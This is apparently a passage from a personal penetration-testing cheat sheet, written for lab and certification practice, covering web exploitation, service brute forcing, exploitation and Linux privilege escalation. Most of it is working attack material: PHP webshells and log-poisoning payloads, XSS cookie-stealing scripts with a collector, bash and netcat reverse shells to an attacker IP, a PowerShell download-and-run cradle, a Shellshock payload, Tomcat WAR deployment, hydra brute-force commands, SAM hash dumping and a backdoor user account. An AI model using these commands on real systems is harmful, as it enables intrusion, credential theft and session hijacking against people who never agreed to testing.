GET /<?php phpinfo(); ?>
~~~
Visit
~~~
http: ... ?view=../../../var/log/apache2/access.log  
~~~
See if phpinfo() is executed.

Possible log iles:
~~~
/var/log/apache/access.log
/var/log/apache/error.log
/var/log/httpd/error_log
/usr/local/apache/log/error_log
/usr/local/apache2/log/error_log
/var/log/nginx/access.log
/var/log/nginx/error.log
/var/log/vsftpd.log
/var/log/sshd.log
/var/log/mail
~~~

**upload PDF**:  
~~~
%PDF-1.4

<?php echo system($_GET['cmd']); ?>
~~~


or upload php-reverse shell as a PDF like above

##### **Remote File Inclusion (RFI)**
/usr/share/webshells/php/ or  
~~~
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.97 LPORT=4444 -o rev_shell.php
~~~

host a php reverse shell locally and  
~~~
http://...?page=http://192.168.1.97/rev_shell.php
~~~

~~~
service apache2 stop
~~~
~~~
php -S \<kali IP>:80
~~~

setup msf multi handler

**-->>> !!! without msf / msfvenom ??? with download and nc?**


##### **XSS**
**test** if XSS is available:  
~~~
<script>alert('xss')</script>

<script>alert("xss")</script>

<iframe src="javascript:alert('xss')">
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert(&quot;XSS&quot;)>
<IMG SRC= onmouseover="alert('xxs')">
<SCRIPT SRC=http://xss.rocks/xss.js></SCRIPT>
<a onmouseover="alert(document.cookie)">xxs link</a>
~~~
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20Injection#xss-in-htmlapplications

also try to add spaces, e.g.
~~~
<script >alert('xss')</script>
~~~
or mix lower- and upper cases, e.g.
~~~
<IMG SRC=JaVaScRiPt:alert('XSS')>
<ScriPt>alert('xss')</script>
~~~
https://owasp.org/www-community/xss-filter-evasion-cheatsheet


**exploits:**  
**1. persistent XSS**  
Inject this to page/comment/etc. pointing to kali IP
~~~
<img src="http://192.168.110.128:8080" width="0" height="0"></img>
~~~
Setup listener
~~~
nc -nvlp 8080
~~~
When user goes to page/comment/etc., we receive his header:
~~~
GET / HTTP/1.1
Host: 192.168.110.128:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://192.168.110.151/blog/members.html
~~~
-> Firefox 15 is vulnerable!!

**2. steal cookies**  

create index.php:
~~~
<?php
$fn="cookie_jar.txt";
$fp=fopen($fn,'a');
$cookie=$_GET['test'];
fwrite($fp, date('Y-m-d H:i:s ') . $cookie . PHP_EOL);
fclose($fp);
?>
~~~
~~~
service apache2 stop

php -S <kali IP>:80
~~~
in other terminal
~~~
tail -f cookie_jar.txt
~~~

inject as e.g. comment:  
~~~
# user does not notice anything
<script> var i = new Image(); i.src="http://<kali IP>/index.php?test="+escape(document.cookie)</script>

# or this - but user will be forwarded to attacker site
<script>location.href='http://<kali IP>/index.php?test='+document.cookie;</script>  
~~~
-> SESSIONID added to `cookie_jar.txt` when user goes to page  
-> paste stolen cookie in storage manager in firefox (Shift + F9)  
-> save / close / refresh page  
-> we are the OTHER user

**3. beef-xss / Browser Exploitation Framework**  
~~~
apt install beef-xss
~~~

http://127.0.0.1:3000/ui/panel
~~~
service apache2 start
gedit /var/www/html/index.html
~~~
copy hook with kali IP from beef start terminal into head section into `/var/www/html/index.html`
~~~
<!doctype html>
<html>
  <head>
    <title>You have been hooked</title>
    <script src="http://192.168.110.128:3000/hook.js"></script>
  </head>
  <body>

  </body>
</html>
~~~
inject (stored XSS) into target with kali IP - e.g. as comment
~~~
<script>location.href='http://192.168.110.128'</script>
~~~
wait for victim to click on it.  
Go to BEEF Control Panel and **enumerate** & exploit (no shell directly).

##### **XXE - XML External Entity Injection Attack**
Replace entity in XML and execute command  
https://github.com/payloadbox/xxe-injection-payload-list


##### **Command Injection**
many possibilities... ???

##### **Node.js deserialization**

1. `git clone https://github.com/ajinabraham/Node.Js-Security-Course.git`

1. generate payload with reverse-shell

    ```
    python nodejsshell.py <kali IP> <port>
    ```

1. insert generated payload to HERE

    ```
    {"rce":"_$$ND_FUNC$$_function (){HERE}()"}
    ```

1. start listener on port

1. perform base64 encode to this and add it to cookie `profile`

    ```
    Coockie: profile=eyJyY2UiOiJfJCR...
    ```

1. reload page

https://www.yeahhub.com/nodejs-deserialization-attack-detailed-tutorial-2018/

https://sking7.github.io/articles/1601216121.html

##### **Upload WebShell w/ WEBDAV**
If Http method PUT is supported and has DAV header  
(see Nikto and nmap http-webdav-scan script):  
~~~
davtest -url $IP
~~~
if succeeded upload file
~~~
curl -X PUT http://$IP/mys.txt -d @php-reverse-shell.php
~~~
execute it
~~~
curl http://$IP/mys.txt
~~~
**Method 2**:
~~~
cadaver -t $IP  
~~~
~~~text
cadaver -t http://$IP/webdav  
dav:\\> put /usr/share/webshells/php-reverse-shell.php mys.txt  
dav:\\> mv mys.txt mys.php
~~~
execute in browser:  
http://$IP/mys.php  
-> webshell

**Method 3**:
Send web request to **Burp Repeater**
Try to bypass validation (file extension, null byte %00, magic byte, escape chars, etc.)

##### **Wordpress**
**Wordpress brute force - unauthenticated ;-)**  
all users:  
~~~
wpscan --url http://$IP/wordpress --passwords /usr/share/wordlists/rockyou_50000.txt
~~~

users 'c0rrupt3d_brain' and 'h3l105':  
~~~
wpscan --url http://$IP/wordpress --passwords /usr/share/wordlists/rockyou_50000.txt  --usernames c0rrupt3d_brain,h3l105
~~~
~~~
hydra -e sr -u -f -l c0rrupt3d_brain -P /usr/share/wordlists/rockyou_50000.txt $IP -V http-post-form "/wordpress/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2F192.168.56.103%2Fwordpress%2Fwp-admin%2F&testcookie=1:Username or Email Address" > hydra.txt
~~~
HTTPS  
wpscan ( --disable-tls-checks )
~~~
wpscan --url https://$IP/wordpress --passwords /usr/share/wordlists/rockyou_50000.txt  --usernames c0rrupt3d_brain,h3l105 --disable-tls-checks
~~~
hydra https ( -s port, https-form-post, see redirect )
~~~
hydra -e sr -u -f -l c0rrupt3d_brain -P /usr/share/wordlists/rockyou_50000.txt $IP -s 443 -V https-form-post "/wordpress/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=https%3A%2F%2F192.168.56.103%2Fwordpress%2Fwp-admin%2F&testcookie=1:Username or Email Address" > hydra.txt
~~~

nmap
~~~
nmap --script http-wordpress-brute --script-args 'userdb=users.txt,passdb=passwds.txt' $IP
~~~

**Brute Force WP-hash**:  
with target_hashes.txt e.g. `$P$ByDvlux0J/6CvT2nU20bxqp/5mDxc00`
~~~
john target_hashes.txt --wordlist=/usr/share/wordlists/rockyou_50000.txt
john target_hashes.txt --show
~~~
or
~~~
hashcat -m 400 target_hashes.txt /usr/share/wordlists/rockyou_50000.txt
hashcat -m 400 --show target_hashes.txt
~~~

**Upload shell - authenticated**  
As wp-admin

1. Install File Manager (WP File Manager 6.9) and upload a reverse-shell php

1. Inject reverse php into Theme - Appearence > Theme Editor > Theme Files (right side) > 404.php Template :  

    cp **/usr/share/webshells/php/php-reverse-shell.php** ./sh.php  
    edit IP and port  
    copy into 404.php  
    access 404.php  

    http://192.168.234.138/wp-content/themes/twentyfifteen/404.php

1. upload own reverseshell.zip as plugin

1. install vulnerable plugin (e.g. reflex-gallery)

1. upload php as png/jpg - if possible

Generate reverse-shell
~~~
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.128 LPORT=4040 -f raw -o shell.php
~~~

https://www.hackingarticles.in/wordpress-reverse-shell/


##### **Drupal**  
RCE:  
You need the plugin php to be installed (check it accessing to /modules/php and if it returns a 403 then, exists, if not found, then the plugin php isn't installed)

Go to Modules -> (Check) PHP Filter  -> Save configuration

https://raw.githubusercontent.com/flozz/p0wny-shell/master/shell.php

Then click on Add content -> Select Basic Page or Article -> Write php shellcode on the body -> Select PHP code in Text format -> Select Preview



##### **phpMyAdmin or MySQL / MariaDB / SQL**
**upload backdoor**
~~~text
SELECT "<?php system($_REQUEST['cmd']); ?>" INTO outfile '/var/www/html/wordpress/wp-content/uploads/cmd1.php'
~~~
~~~text
http://192.168.1.118/wordpress/wp-content/uploads/cmd1.php?cmd=cat /etc/passwd
~~~
**phpMyAdmin brute force**  
~~~
hydra -e sr -u -f -l admin -P /usr/share/wordlists/rockyou_50000.txt $IP -V http-post-form "/php/phpmyadmin/index.php:pma_username=^USER^&pma_password=^PASS^&server=1&target=phpinfo.php:1045 Cannot log in to the MySQL server" | tee hydra.txt
~~~


##### **Tomcat**
**Default credentials**

The most interesting path of Tomcat is /manager/html, inside that path you can upload and deploy war files (execute code). But  this path is protected by basic HTTP auth. See Default Credentials section.


**RCE**
~~~
# Generate payload
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.234.149 LPORT=4444 -f war > shell.war

# Upload payload
Tomcat6 :
wget 'http://<USER>:<PASSWORD>@<IP>:8080/manager/deploy?war=file:shell.war&path=/shell' -O -

Tomcat7 and above :
curl -v -u <USER>:<PASSWORD> -T shell.war 'http://<IP>:8080/manager/text/deploy?path=/shellh&update=true'

# Listener
nc -lvp <PORT>

# Execute payload
curl http://<IP>:8080/shell/
~~~

##### **Apache - ShellShock**
If detected a `cgi-bin` directory like `/cgi-bin/underworld`  
~~~
nmap -sV -p80 --script http-shellshock --script-args uri=/cgi-bin/underworld,cmd=ls $IP 
~~~
If vulnerable, edit the User Agent, Connection, Cookie or Referer parameter
~~~
Connection: () { :;}; echo; /bin/bash -c 'nc 192.168.1.127 1337 -e /bin/sh'
~~~






### **TFTP (69)**
#### **Enum**
~~~
tftp $IP

tftp $IP 36969
~~~
#### **Vulnerability Scan**
#### **Exploit**



### **POP3 (110 / 995)**
#### **Enum**
https://book.hacktricks.xyz/pentesting/pentesting-pop

~~~
nc -nv $IP 110

openssl s_client -connect $IP:995 -crlf -quiet
~~~

#### **Vulnerability Scan**
#### **Exploit**
~~~
hydra -e nsr -u -f -L user_pop3.txt -P /usr/share/wordlists/rockyou_50000.txt $IP -s 110 pop3 -V
hydra -e nsr -u -f -L user_pop3.txt -P /usr/share/wordlists/rockyou_50000.txt $IP -s 110 pop3 -V -m TLS

hydra -e nsr -u -f -L user_pop3.txt -P /usr/share/wordlists/rockyou_50000.txt $IP -s 995 pop3 -V -S
~~~
~~~
POP commands:
  USER uid           Log in as "uid"
  PASS password      Substitue "password" for your actual password
  STAT               List number of messages, total mailbox size
  LIST               List messages and sizes
  RETR n             Show message n
  DELE n             Mark message n for deletion
  RSET               Undo any changes
  QUIT               Logout (expunges messages if no RSET)
  TOP msg n          Show first n lines of message number msg
  CAPA               Get capabilities
~~~


### **RPCBind / NFS (111)**
#### **Enum**
~~~
nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount $IP

rpcinfo -p $IP

showmount -e $IP 
~~~

#### **Vulnerability Scan**
#### **Exploit**
~~~
 
mkdir user5  
mount -t nfs $IP:/home/user5 user5
mount -t nfs $IP:/home/user5 user5 -nolock
~~~


### **RPC (135)**
#### **Enum**
~~~text
rpcclient --user="" --command=enumprivs -N $IP

rpcclient -U "" $IP  
> srvinfo  
> enumdomusers  
> queryuser <username>
> netshareenumall
~~~

#### **Vulnerability Scan**
#### **Exploit**


### **NETBIOS (137/138/139) / SMB (445)**
#### **Enum**
**from Windows**:  
~~~
nbtstat -A $IP  
~~~
~~~
net view $IP
~~~
**from Kali**:  
ignore error msg's
~~~
enum4linux -a $IP
~~~
List shares
~~~
smbmap -u '' -p '' -H $IP

smbclient -L //$IP  
smbclient -L //$IP -U ''  
smbclient -L //$IP -U <user>  

# use degraded smb1 protocoll
# e.g. if 'stat' not working in smbclient
# or use smbcacls
smbclient -L //$IP -U <user>  -m NT1

crackmapexec smb $IP
crackmapexec smb $IP --shares -u 'patrick' -p ''

crackmapexec smb -u user_ssh.txt -p passwd.txt --shares $IP

~~~
Login
~~~
smbclient //$IP/IPC$
smbclient //$IP/kathy -U kathy

smb\> recurse
smb\> prompt
smb\> ls
smb\> mget *
~~~

Check file access
~~~
smbcacls //$IP/EricsSecretStuff ebd.txt -U eric%mypassword
~~~

~~~
/usr/share/legion/scripts/smbenum.sh $IP
~~~
~~~
nbtscan $IP
~~~
try also rpcclient.

msfonsole, e.g. auxiliary/scanner/smb/smb_version
#### **Vulnerability Scan**
#### **Exploit**
**brute force**:  
~~~
medusa -e ns -u helios -P passwd.txt -h $IP -M smbnt -v 4

hydra -e nsr -u -f -L user.txt -P /usr/share/wordlists/rockyou_50000.txt $IP  smb -V
~~~
**Manual against e.g. SMB**
searchsploit / google sevice and version  
download exploit if exists  
check if sth has to be modified in exploit  
compile & run

**shell in smbclient**  
if anonymous access allowed
~~~
smbclient //$IP/tmp

smb\> logon "/=`nc 192.168.234.149 4444 -e /bin/bash`"
~~~
**RCE over SMB**
~~~
smbexec.py <user>:<passwd>@$IP

wmiexec.py <user>:<passwd>@$IP

psexec.py <user>:<passwd>@$IP
~~~



### **IMAP (143 / 993)**
#### **Enum**
~~~
nc $IP 143

nc --ssl $IP 993

> A001 login <user> <passwd>
> n namespace
> A1 list "INBOX/" "*"

~~~


#### **Vulnerability Scan**
#### **Exploit**
~~~
hydra -u -e srn -f -L user_imap.txt -P /usr/share/wordlists/rockyou_50000.txt $IP -s 993 imap -V -S

hydra -u -e srn -f -L user_imap.txt -P /usr/share/wordlists/rockyou_50000.txt $IP -s 143 imap -V

hydra -u -e srn -f -L user_imap.txt -P /usr/share/wordlists/rockyou_50000.txt $IP -s 143 imap -V -m TLS
~~~

### **SNMP (161)**
#### **Enum**
search for more open ports, users...
~~~
snmpwalk -v2c -c public $IP 1

snmp-check $IP -v 1
snmp-check $IP -v 2c

echo public > community
echo private >> community
echo manager >> community
onesixtyone -c community $IP

nmap -sU -p 161 --script=snmp-info $IP
nmap -sU -p 161 -A $IP
~~~
#### **Vulnerability Scan**
#### **Exploit**




### **AD / LDAP (389)**
#### **Enum**
~~~
nmap -p 389 --script=ldap-search $IP

rpcclient $IP
rpcclient $IP -U ''
rpcclient $> enumdomusers
~~~
~~~
ldapdomaindump -u SITTINGDUCK\\notanadmin -p asd123 symfonos.local
~~~
~~~
ldapsearch -x -b "dc=devconnected,dc=com" -H ldap://$IP
~~~
https://medium.com/@adam.toscher/top-five-ways-i-got-domain-admin-on-your-internal-network-before-lunch-2018-edition-82259ab73aaa

https://book.hacktricks.xyz/pentesting/pentesting-ldap

https://repo.zenk-security.com/Techniques%20d.attaques%20%20.%20%20Failles/LDAP%20Injection%20and%20Blind%20LDAP%20Injection.pdf

**Windows**: Get Ntds.dit file if possible!

#### **Vulnerability Scan**
#### **Exploit**



### **ORACLE (1521)**
#### **Enum**
~~~
tnscmd10g version -h $IP
tnscmd10g status -h $IP
~~~
#### **Vulnerability Scan**
#### **Exploit**


### **MYSQL (3306)**
#### **Enum**
~~~
mysql -u root -p

mysql -u webadmin -h $IP -p

# different PORT
mysql -u root -p -h $IP -P 13306
~~~
#### **Vulnerability Scan**
#### **Exploit**


### **RDP (3389)**
#### **Enum**
~~~
rdesktop -u <USERNAME> <IP>
rdesktop -d <DOMAIN> -u <USERNAME> -p <PASSWORD> <IP>

xfreerdp /u:[DOMAIN\]<USERNAME> /p:<PASSWORD> /v:<IP>
xfreerdp /u:[DOMAIN\]<USERNAME> /pth:<HASH> /v:<IP>
~~~
#### **Vulnerability Scan**
#### **Exploit**
~~~text
hydra -e nsr -u -f -L users.txt -P /usr/share/wordlists/rockyou_50000.txt $IP rdp -V  
~~~

Session stealing
~~~
query user

tscon <ID> /dest:<SESSIONNAME>
~~~

### **Others (VNC, ...)**
https://liodeus.github.io/2020/09/18/OSCP-personal-cheatsheet.html


## **3. Vulnerability Scanning**
---

### **nmap scripts**
~~~
locate .nse | grep smb | grep vuln
~~~
~~~
nmap --script smb-vuln* -p 445 $IP
~~~

### **GOOGLE**
see scan results ... start with :80, :443, :139/:445 -> **google** "XYZ exploit" !  
www.exploit-db.com  
www.github.com (might even be more up-to-date than exploit-db)  
www.cvedetails.com - look for _**RED**_/critical score  
www.rapid7.com  
-> Collect links to possible exploits.

### **searchsploit**
~~~
searchsploit Samba 2  
~~~
show content of exploit file
~~~
searchsploit -x linux/remote/23296.txt
~~~
mirror (copy) exploit file to curr. dir.
~~~
searchsploit -m linux/remote/23296.txt
~~~

### **Capture network traffic**
~~~
tcpdump -i eth0 -U -s0 -w - > net.cap
~~~
Live capture over ssh
~~~
ssh user@$IP "tcpdump -i eth0 -U -s0 -w -" | wireshark -k -i -
~~~
~~~
wireshark net.cap
~~~

### **Steganography:**  
~~~
binwalk banner.jpg

exiftool banner.jpg

stegosuite banner.jpg

strings -n 5 banner.jpg
~~~
extract zlib from png:
~~~
binwalk -e tartarus.png
~~~
different strings encoding (`-e <encoding>`)
~~~
strings -e l banner.jpg
~~~
~~~
nmap --script=http-exif-spider -p80,443 $IP
~~~


### **Watson (Win)**

https://github.com/rasta-mouse/Watson






## **4. Exploitation**
---

### **PoC RCE on remote**
on kali:
~~~text
tcpdump -i tun0 icmp
~~~
on target: try code injection/RCE/PoC with a `ping <kali IP>`


### **Reverse SHELL Linux**
If **port (eg. 4444) not working**, try 443 or 80 which are not filtered!

Replace `<kali IP>`

**BASH:**  
~~~
bash -c "bash &>/dev/tcp/<kali IP>/4444 <&1"
~~~

**NC:**  
~~~
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <kali IP> 4444 >/tmp/f

nc <kali IP> 4444 -e /bin/bash
~~~

**Webshells in Kali**  
~~~
ls -l /usr/share/webshells
~~~

http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

**Spawn tty shell**  
~~~
python -c 'import pty;pty.spawn("/bin/bash");'
~~~


**Set term rows and columns**
~~~
stty cols 160 rows 60
~~~

**History and Tab** in shell
~~~
Ctrl-Z
stty raw -echo
fg
~~~
Clean up shell in Kali after nc-shell
~~~
stty raw echo
~~~
https://netsec.ws/?p=337

### **Reverse SHELL Windows**

~~~text
cd /opt/nishang/Shells/Invoke-PowerShellTcp.ps1 nishang.ps1
vi nishang.ps1
~~~
copy 1st EXAMPLE to the buttom and edit IP and PORT:
~~~text
Invoke-PowerShellTcp -Reverse -IPAddress <IP kali> -Post 4444
~~~
On kali:
~~~text
python3 -m http.server 80
~~~
On Windows target:
~~~
powershell.exe -nop -exec bypass -C 'IEX (New-Object Net.WebClient).downloadString("http://<IP kali>:80/nishang.ps1")'
~~~

**In case not working** - try base64 encode the command (special characters)  
On kali
~~~
echo -n 'IEX (New-Object Net.WebClient).downloadString("http://<IP kali>:80/nishang.ps1")' | iconv -f ASCII -t UTF-16LE | base64 | tr -d "\n"
~~~
On target
~~~
powershell.exe -nop -exec bypass -enc <base64-encoded string here>

~~~

### **Payloads**
**Non-staged** payload: windows/meterpreter_reverse_tcp  
**Staged** payload: windows/meterpreter/reverse_tcp - **needs msf**: explot/multi/handler

If one type does not work, try the other type of payload.


### **Metasploit against e.g. SMB**
~~~
msfconsole  
~~~
-> search XYZ  
-> use <# of module>  
-> options  
-> set rhosts 192.168.97.128  
-> show targets  
-> run

**payload options** (show up after RHOST is set)  
if payload does not work, try other payload (staged / non-staged)  
-> options  
-> if payload options available try staged payload:  
-> set payload **generic**/\<TAB>\<TAB> ...
-> run

-> or a different payload corresponding to same exploit:  
~~~
set payload linux/meterpreter/<TAB><TAB> ...  
~~~
or 
~~~ 
set payload generic/meterpreter/<TAB><TAB> ...
~~~


### **Password Brute Force / Hash Cracking**
~~~
hashid <hash>
hash-identifier <hash>
~~~
https://hashes.com

https://crackstation.net/  (has not everything -> google it !)  

google "md5 87e6d56ce79af90dbe07d387d3d0579e"  
https://gchq.github.io/CyberChef/ (try the Magic option!)


~~~
apt install seclists
~~~
https://github.com/danielmiessler/SecLists

**Hashcat**  
https://tools.kali.org/password-attacks/hashcat  
https://hashcat.net/wiki/doku.php?id=example_hashes  

Search for hash format examples
~~~
hashcat --example-hash |more
~~~

Hashcat example:  
**Windows** / Host
~~~text
d:
cd d:\Pentest\passwords\hashcat-5.1.0\
hashcat64.exe -m 1800 -a 0 -o ..\hash_clear.txt -O -D1,2 --force -w 4 ..\hash.txt ..\rockyou.txt

hashcat64.exe -m 1800 --show ..\hash.txt
~~~

**Linux** / VM - VM is **slow - only CPU**
~~~
hashcat -m 1720 -a 0 -o hash_clear.txt -O target_hash.txt /usr/share/wordlists/rockyou.txt.gz
~~~
with target_hash.txt example `<sha512>:<salt>`  
~~~text
3016562ff7bdaa11d00dcf77d1561a6c0fdd6846adc1c461951a955d1f9062f6f40dbecdd5437e22a2eda114ea6a81d1956beecd33dcc968153370870d1aed88:of7xGI2FwdabPYZTaEGeD6YRjZPRvBVSnZHDg2BCPqtIkip455TKSf0sGbisaPBRM
~~~

See results:
~~~

~~~

**John-the-ripper**  
hash-file example: `user:hash`  
e.g. WP-hash:
~~~text
Peter:$P$BTzoYuAFiBA5ixX2njL0XcLzu67sGD0
~~~

**Windows Hash**  
Dump hashes
~~~
reg save HKLM\SAM c:\SAM
reg save HKLM\System c:\System

samdump2 System SAM > hashes
~~~
crack with john
~~~
john --wordlist=/usr/share/wordlists/rockyou.txt <windows hash dump>  
john --show <windows hash dump>
~~~
crack  with hashcat (on **Windows**/Host)
~~~text
# windows hash dump (ntlm.txt)
cat ntlm.txt | cut -d ':' -f 4 > ntlm_hash.txt

hashcat64.exe -m 1000 -o ntlm_hash_clear.txt -O -D1,2 ..\ntlm_hash.txt ..\rockyou.txt
~~~

**Linux Hash**  
~~~bash
unshadow passwd.txt shadow.txt > unshadow.txt  

john --wordlist=/usr/share/wordlists/rockyou.txt unshadow.txt  

john unshadow.txt --show
~~~
or combine words with rules
~~~bash
john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadow.txt  
~~~
OR  
~~~
hashcat -m 500 /usr/share/wordlists/rockyou.txt unshadow.txt
~~~

**Encrypted ZIP**  
~~~
zip2john lmao.zip > lmao.hash
~~~

**generate wordlist from website**  
~~~text
cewl -d 4 -m 3 --with-numbers -e --email_file emaillist.txt -w wordlist.txt $IP

cewl -d 4 -m 3 --with-numbers -e --email_file emaillist.txt -w wordlist.txt https://$IP:443

# with proxy (--proxy_*)
cewl -d 4 -m 3 --with-numbers -e --email_file emaillist.txt -w wordlist.txt --proxy_host $IP --proxy_port 3128 $IP/wolfcms

# with cookie / header (-H)
cewl -d 4 -m 3 -H "Content-Type: application/x-www-form-urlencoded" -H "Cookie: ctfchallenge=eyJkYXRhIjoiZXlKMWMyVnlYMmhoYzJnaU9pSnRjWHB1TWpCMll5SXNJbkJ5WlcxcGRXMGlPbVpoYkhObGZRPT0iLCJ2ZXJpZnkiOiIxN2YyNDliZjhjOTY1NGNiMTA2Y2IxYzJkMGZjZmMyOSJ9" --with-numbers -e --email_file emaillist.txt -w wordlist.txt http://vulnforum.co.uk
~~~

modify word list with rules
~~~
john --wordlist=wordlist.txt --rules --stdout > wordlist_mut.txt
john --wordlist=wordlist.txt --rules=jumbo --stdout > wordlist_mut.txt
~~~
**generate wordlist with CRUNCH**  
~~~
crunch 7 7 -t ,%flesh > wordlist_rick_mut.txt  
~~~
~~~
crunch 10 10 -t ,%curtains >> wordlist_rick_mut.txt
~~~

all words of 3-4 length containing numbers and lowercase letters  
~~~
crunch 3 4 0123456789abcdefghijklmnopqrstuvwxyz > wordlist_crunch.txt
~~~

### **Compile Exploits**
Linux
~~~text
# 64 bits
gcc -o exploit exploit.c

# 32 bits
gcc -m32 -o exploit exploit.c
~~~

Windows
~~~text
To compile Win32 bit executables, execute i686-w64-mingw32-gcc -o <FILE.exe> <FILE.c>
To compile Win64 bit executables, execute x86_64-w64-mingw32-gcc -o <FILE.exe><FILE.c>
To Compiled .cpp source file, execute i586-mingw32msvc-g++ -o <FILE>.exe <FILE>.cpp
To compile python scripts, pyinstaller --onefile <SCRIPT.py>

# Compile windows .exe on Linux
i586-mingw32msvc-gcc exploit.c -lws2_32 -o exploit.exe
~~~

Cross-compile
~~~text
gcc -m32 -Wall -Wl,--hash-style=both -o gimme.o gimme.c
~~~

### **Others**

google: windows exploit suggester  
https://github.com/AonCyberLabs/Windows-Exploit-Suggester

### **Maintain Access**
~~~
net user hacker password123 /add
~~~

### **Pivoting**
#### **a. MSF Meterpreter**
on target 192.168.57.139 ...

Discover other network

Win:  
~~~
route print

ipconfig
~~~

Discover other host on other network:  
~~~
arp -a
~~~

Then back in msf (Ctrl-C)  
~~~
run autoroute -s 10.10.10.0/24 (other network)  
run autoroute -p  
background  
use auxiliary/scanner/portscan/tcp  
...
~~~

#### **b. in reverse shell**
~~~text
arp add route <other network>
~~~

#### **c. SSH**
???


## **5. Privilege Escalation**
---

**SUID exec**  
1. craft own executable called in suid-exec
e.g. myexec calls "cat /home/mike/msg.txt" -> create my own "cat"

1. SUID exec calls binary w/o full path -> change PATH to /tmp:$PATH, add malicous binary to /tmp

**files changed in the last 5-15 min**  
possible cron exploit

### **5.1 LINUX**


- Credential Access
    - Reuse Passwords
        - all user/password-combinations: try su, try on all services
    - Credentials from Configuration Files
    - Credentials from Local Database
    - Credentials from Bash History
        ~~~
        history

        ls -la /root/.bash_history
        ls -la /home/user/.bash_history
        ~~~
    - SSH Keys
        ~~~
        ls -la /root/.ssh/id_rsa
        ls -la /home/user/.ssh/id_rsa
        ~~~
    - Sudo Access
        ~~~
        sudo -l
        ~~~    
    - Group Privileges (Docker, LXD, etc.)
        ~~~
        id
        ls -la /etc/group
        ~~~
- Exploit
    - Services Running on Localhost
        ~~~
        ps -ef
        ps -ef|grep root
        ss -lntpt
        ~~~
    - Kernel Version
        ~~~
        uname -a
        lsb_release -a  
        cat /etc/*-release
        ~~~
    - Binary File Versions (-> searchsploit / google)
- Misconfiguration
    - Cron Jobs
        ~~~
        crontab -l
        cat /etc/crontab

        # files changed in last 5 minutes
        find / -type f -mmin -5 2>/dev/null | grep -v proc | grep -v "/sys/" | grep -v "/run/" | grep -v cgroup
        ~~~
        - Writeable Cron Jobs
        - Writeable Cron Job Dependency (File, Python Library, etc.)
    - SUID / SGID Files
        ~~~
        find / -user root -perm -4000 -exec ls -ldb {} \;  2>/dev/null

        find / -group root -perm -2000 -exec ls -ldb {} \;  2>/dev/null
        ~~~
    - Interesting Capabilities on Binary (e.g. SUID, etc.)
        - see lse.sh or linpeas.sh output
    - Sensitive Files Writable / Readable
        ~~~
        ls -la /etc/passwd  
        cat /etc/passwd  
        ls -la /etc/shadow  
        ls -la /etc/sudoers

        cd /root
        cd /home

        ls -la /root/.ssh/id_rsa
        ls -la /home/user/.ssh/id_rsa

        ls -la /var/www/html
        ls -la /opt

        # Find all writable root files
        find / -type f -user root -perm /o=w 2>/dev/null | grep -v proc | grep -v cgroup
        ~~~
        - Configuration Files
    - Writable PATH
        - Root $PATH Writable
        - Directory in Path Writable
    - LD_PRELOAD Set in /etc/sudoers

**Escape from WINE**:  
Start listener on Kali e.g. port 5555, then on target
~~~
start /unix /bin/bash -c "bash &>/dev/tcp/192.168.1.139/5555 <&1"
~~~
**Escape from restricted bash**  
rbash
~~~
ssh mindy@$IP -t bash
ssh mindy@$IP -t "/bin/sh"
~~~
lshell
~~~
echo os.system('/bin/bash')
~~~
https://gtfobins.github.io/

**Check...**
~~~
whoami   
hostname  
  



# grep for usernames
cd /
grep -rl aubreanna 2>/dev/null

locate *.txt
# or
find / -type f -name *.txt 2>/dev/null




~~~


Check if in container
~~~
cat /proc/1/environ
~~~


**PORT FORWARDING**

**PTS - eJPT**
~~~
ip route add ROUTETO via ROUTEFROM-gateway
~~~

**SSH**
~~~
ssh -L 8080:127.0.0.1:8080 aeolus@$IP
~~~
redirect port 8080 to local/kali port 8081
~~~
ssh -L 8081:127.0.0.1:8080 aeolus@$IP
~~~

or if already logged in in ssh
~~~
aeolus@symfonos2:~$ (enter / newline)
aeolus@symfonos2:~$ ~C
ssh> -L 8081:localhost:8080
~~~

**METERPRETER > portfwd**

1. create payload `msfvenom --platform linux -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.127 LPORT=8900 -f elf -o msf.bin`

1. transfer payload msf.bin to target  

1. msfconsole - use exploit/multi/handler - payload see above - run -j  

1. start payload on target -> session created  

1. `session -i 1`

1. `route add 192.168.1.139 255.255.255.0 3`

1. `portfwd add -l 8081 -p 8080 -r   `

**Port Forwarding - chisel**

https://github.com/jpillora/chisel/tags

0. **download** .gz, then **rename** to chisel and **chmod** 777 chisel
1. on local / kali
~~~
./chisel server -p 9002 --reverse     
~~~

2. on target
~~~
chisel client <listening server IP>:<listening port> R:<port on kali>:<local IP>:<local port>
e.g.

./chisel client 192.168.1.127:9002 R:8081:localhost:8080
~~~

3. now visit on kali `http://localhost:8081` to see `http://localhost:8081` running on target.

**Port Forwarding - plink**  
/usr/share/windows-resources/binaries/plink.exe

**sudo -l**  
if www-data can run commands as ... or switch to user ...:  
www-data: upload php-reverse-shell  
(see pentestmonkey)  
-> spawning a tty shell (if can't access tty)  
~~~
sudo -u <user> /bin/bash  
~~~
or 
~~~ 
sudo su -
~~~


Find all files executable by user 'milton'
~~~
find / -user milton -perm /u=x 2>/dev/null | grep -v "/proc"
~~~



**SUID**  

1. strings <exec>

1. exec calls other exe's without full path

1. pipe into `more` etc. then `:!<cmd>`

1. https://www.hackingarticles.in/linux-privilege-escalation-using-suid-binaries/


**Enumeration Scripts**    

On Kali
~~~
cd /usr/local/bin
python3 -m http.server 80
~~~

On Target (**change IP before copy-paste !!!**)
~~~
wget 192.168.1.128/lse.sh
wget 192.168.1.128/linpeas.sh

chmod 777 *.sh

./lse.sh -l 1 > lse.txt
